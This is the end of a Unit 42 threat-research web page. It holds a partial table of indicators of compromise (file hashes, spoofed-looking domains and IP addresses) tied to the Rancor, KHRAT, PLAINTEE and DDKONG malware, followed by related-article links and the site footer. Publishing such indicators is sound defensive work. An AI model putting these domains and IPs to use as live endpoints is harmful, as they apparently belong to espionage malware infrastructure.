| Hash         | a725abb8fe76939f0e0532978eacd7d4afb4459bb6797ec32a7a9f670778bd7e | A               |
| Hash         | 82e1e296403be99129aced295e1c12fbb23f871c6fa2acafab9e08d9a728cb96 | A               |
| Hash         | 9996e108ade2ef3911d5d38e9f3c1deb0300aa0a82d33e36d376c6927e3ee5af | A               |
| Domain       | www.google\_ssl.onmypc.org                                        | A               |
| Hash         | 18e102201409237547ab2754daa212cc1454f32c993b6e10a0297b0e6a980823 | A               |
| IP           | 103.75.191.75                                                    | A               |
| Hash         | c78fef9ef931ffc559ea416d45dc6f43574f524ba073713fddb79e4f8ec1a319 | A               |
| Hash         | 01315e211bac543195f2c703033ba31b229001f844854b147c4b2a0973a7d17b | A               |
| Hash         | b8528c8e325db76b139d46e9f29835382a1b48d8941c47060076f367539c2559 | A               |
| Hash         | df14de6b43f902ac8c35ecf0582ddb33e12e682700eb55dc4706b73f5aed40f6 | A               |
| Hash         | 177906cb9170adc26082e44d9ad1b3fbdcba7c0b57e28b614c1b66cc4a99f906 | A               |
| Hash         | 113ae6f4d6a2963d5c9a7f42f782b176da096d17296f5a546433f7f27f260895 | A               |
| Domain       | ftp.chinhphu.ddns.ms                                             | A               |
| Hash         | 128adaba3e6251d1af305a85ebfaafb2a8028eed3b9b031c54176ca7cef539d2 | A               |
| Domain       | www.microsoft.https443.org                                       | A               |
| IP           | 45.121.146.26                                                    | A               |
| Hash         | 5afbee76af2a09c173cf782fd5e51b5076b87f19b709577ddae1c8e5455fc642 | A               |
| Domain       | msdns.otzo.com                                                   | A               |
| Hash         | 119572fafe502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0 | A               |
| Domain       | goole.authorizeddns.us                                           | A               |
| IP           | 103.75.189.74                                                    | A               |

Back to top

### Tags

* [DDKONG](https://unit42.paloaltonetworks.com/tag/ddkong/ "DDKONG")
* [KHRAT](https://unit42.paloaltonetworks.com/tag/khrat/ "KHRAT")
* [PLAINTEE](https://unit42.paloaltonetworks.com/tag/plaintee/ "PLAINTEE")
* [RANCOR](https://unit42.paloaltonetworks.com/tag/rancor/ "RANCOR")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: Tick Group Weaponized Secure USB Drives to Target Air-Gapped Critical Systems](https://unit42.paloaltonetworks.com/unit42-tick-group-weaponized-secure-usb-drives-target-air-gapped-critical-systems/ "Tick Group Weaponized Secure USB Drives to Target Air-Gapped Critical Systems")

### Related Articles

* [Rancor: Cyber Espionage Group Uses New Custom Malware to Attack Southeast Asia](https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/ "article - table of contents")
* [Updated KHRAT Malware Used in Cambodia Attacks](https://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/ "article - table of contents")

## Related Malware Resources

![Pictorial representation of a magnifying glass illuminating a glowing orange circular digital circuit interface on a dark, high-tech background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Myth-Busting_Overview_1920x900-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) September 16, 2026 [#### Atomic macOS (AMOS) Stealer Activity](https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/)

* [MacOS](https://unit42.paloaltonetworks.com/tag/macos/ "macOS")

* [Threat intelligence](https://unit42.paloaltonetworks.com/tag/threat-intelligence/ "threat intelligence")

* [Unit 42](https://unit42.paloaltonetworks.com/tag/unit-42/ "Unit 42")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/ "Atomic macOS (AMOS) Stealer Activity")  
  ![Pictorial representation of post-exploitation identity misuse in SPIFFE/SPIRE. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 10, 2026 [#### The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/)

* [API](https://unit42.paloaltonetworks.com/tag/api/ "API")

* [Cryptographic](https://unit42.paloaltonetworks.com/tag/cryptographic/ "cryptographic")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/ "The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE")  
  ![Pictorial representation of a pay-per-install threat group campaign prodiving infection service for spreading malware. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip, symbolizing data processing and transfer. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Malware_Category_1920x900-6-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 9, 2026 [#### Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/)

* [ARKTunnel](https://unit42.paloaltonetworks.com/tag/arktunnel/ "ARKTunnel")

* [C2](https://unit42.paloaltonetworks.com/tag/c2/ "C2")

* [CL-CRI-1171](https://unit42.paloaltonetworks.com/tag/cl-cri-1171/ "CL-CRI-1171")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/ "Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure")  
  ![Pictorial representation of attackers using AI tools to target Latin American organizations. A vibrant cityscape with silhouettes of numerous people walking along a bustling street. The scene is illuminated by bright urban lights and digital-like particles, creating a dynamic and futuristic atmosphere.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/AdobeStock_768915868-2-1-786x373.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 3, 2026 [#### Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/)

* [Agentic AI](https://unit42.paloaltonetworks.com/tag/agentic-ai/ "Agentic AI")

* [ChatGPT](https://unit42.paloaltonetworks.com/tag/chatgpt/ "ChatGPT")

* [CL-CRI-1131](https://unit42.paloaltonetworks.com/tag/cl-cri-1131/ "CL-CRI-1131")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/ "Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America")  
  ![Pictorial representation of vishing campaigns in Microsoft Teams. A digital image of a skull formed by blue binary code on a black background, with scattered ones and zeros and digital noise, symbolizes how stealthy prompt injection attacks can exploit AI logic to bypass security controls.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/01_Malware_Category_1920x900-5-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 31, 2026 [#### Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/)

* [Cloaked Ursa](https://unit42.paloaltonetworks.com/tag/cloaked-ursa/ "Cloaked Ursa")

* [Entra ID](https://unit42.paloaltonetworks.com/tag/entra-id/ "Entra ID")

* [Microsoft Teams](https://unit42.paloaltonetworks.com/tag/microsoft-teams/ "Microsoft Teams")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/ "Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams")  
  ![Pictorial representation of AI-enabled malware. A vibrant digital interface displaying various icons and graphs, resembling a futuristic network or data analysis dashboard. The scene is illuminated with glowing lights and patterns.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1270203474-2-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 25, 2026 [#### The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/)

* [Backdoor](https://unit42.paloaltonetworks.com/tag/backdoor/ "backdoor")

* [Bitcoin](https://unit42.paloaltonetworks.com/tag/bitcoin/ "Bitcoin")

* [DLL hijacking](https://unit42.paloaltonetworks.com/tag/dll-hijacking/ "DLL hijacking")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/ "The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution")  
  ![Pictorial representation of identity abuse through trusted communication channels. Close-up view of a digital screen displaying a glitched and pixelated image of a skull-like shape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/02_Malware_Category_1920x900-2-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 20, 2026 [#### Identity Abuse Through Trusted Communication Channels](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/)

* [Authentication](https://unit42.paloaltonetworks.com/tag/authentication/ "authentication")

* [Identity theft](https://unit42.paloaltonetworks.com/tag/identity-theft/ "identity theft")

* [Malware](https://unit42.paloaltonetworks.com/tag/malware/ "malware")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/communication-channel-identity-risks/ "Identity Abuse Through Trusted Communication Channels")  
  ![Pictorial representation of Kimwolf botnet malware family. Digital screen with a warning sign reading "Malware." The background features lines of computer code and graphics, creating a sense of cybersecurity threat.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/07_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 11, 2026 [#### Kimwolf v7: An Evolution of the Kimwolf Botnet](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/)

* [Android APK](https://unit42.paloaltonetworks.com/tag/android-apk/ "Android APK")

* [Ethereum](https://unit42.paloaltonetworks.com/tag/ethereum/ "Ethereum")

* [HTTP](https://unit42.paloaltonetworks.com/tag/http/ "HTTP")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/ "Kimwolf v7: An Evolution of the Kimwolf Botnet")  
  ![Pictorial representatiom pf Aeternum's blockchain C2. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/04_Malware_Category_1920x900-4-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 10, 2026 [#### The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/)

* [Aeternum](https://unit42.paloaltonetworks.com/tag/aeternum/ "Aeternum")

* [Infection chain](https://unit42.paloaltonetworks.com/tag/infection-chain/ "infection chain")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/ "The Permanent Threat: Analyzing Aeternum’s Blockchain-Based C2 Operations and Communications")  
  ![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) August 6, 2026 [#### ChainDrop: Inside a Self-Propagating npm Worm](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/tag/blockchain/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/tag/claude-code/ "Claude code")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/ "ChainDrop: Inside a Self-Propagating npm Worm")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Get updates from Unit 42

## Peace of mind comes from staying ahead of threats. Subscribe today.

Your Email

Subscribe for email updates to all Unit 42 threat research.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use "Terms of Use") and acknowledge our [Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/privacy "Privacy Statement")

This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.

Invalid captcha!
Subscribe ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security)

* [Secure AI by Design](https://www.paloaltonetworks.com/ai-security)

* [Prisma AIRS](https://www.paloaltonetworks.com/ai-security/prisma-airs)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/ot-security-solution)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase)

* [Prisma SASE](https://www.paloaltonetworks.com/sase)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/content/pan/en_US/cortex/managed-detection-and-response)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam)

* [Next-Generation Identity Security](https://www.paloaltonetworks.com/idira)

* [Privileged Access Management](https://www.paloaltonetworks.com/idira/human/privileged-access-management)

* [Identity and Access Management](https://www.paloaltonetworks.com/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.com/idira/human/endpoint-privilege-manager)

* [Identity Governance](https://www.paloaltonetworks.com/idira/human/identity-governance)

* [Workforce Password Management](https://www.paloaltonetworks.com/idira/human/workforce-password-management)

* [Agentic Identities](https://www.paloaltonetworks.com/idira/agentic)

* [Secrets Management](https://www.paloaltonetworks.com/idira/machine/secrets-management)

* [Unified Secrets Governance](https://www.paloaltonetworks.com/idira/machine/unified-secrets-governance)

* [Application Credentials Delivery](https://www.paloaltonetworks.com/idira/machine/application-credentials-delivery)

* [Vendor Privileged Access](https://www.paloaltonetworks.com/idira/human/vendor-privileged-access)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42)

* [Prepare for Emerging Risks](https://www.paloaltonetworks.com/unit42/frontier-ai-defense)

* [Strengthen Your Defenses](https://www.paloaltonetworks.com/unit42/strengthen-your-defenses)

* [Build Your Security Strategy](https://www.paloaltonetworks.com/unit42/build-your-security-strategy)

* [Understand the Adversary](https://www.paloaltonetworks.com/unit42/threat-intelligence)

* [Respond to a Cyber Attack](https://www.paloaltonetworks.com/unit42/respond)  
  Company

* [About Us](https://www.paloaltonetworks.com/about-us)

* [Careers](https://jobs.paloaltonetworks.com/en/)

* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales)

* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Customers](https://www.paloaltonetworks.com/customers)

* [Investor Relations](https://investors.paloaltonetworks.com/)

* [Location](https://www.paloaltonetworks.com/about-us/locations)

* [Newsroom](https://www.paloaltonetworks.com/company/newsroom)  
  Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Communities](https://www.paloaltonetworks.com/communities)

* [Content Library](https://www.paloaltonetworks.com/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Event Center](https://events.paloaltonetworks.com/)

* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)

* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/certifications)

* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)

* [Sitemap](https://www.paloaltonetworks.com/sitemap)

* [Tech Docs](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy)

* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documents](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
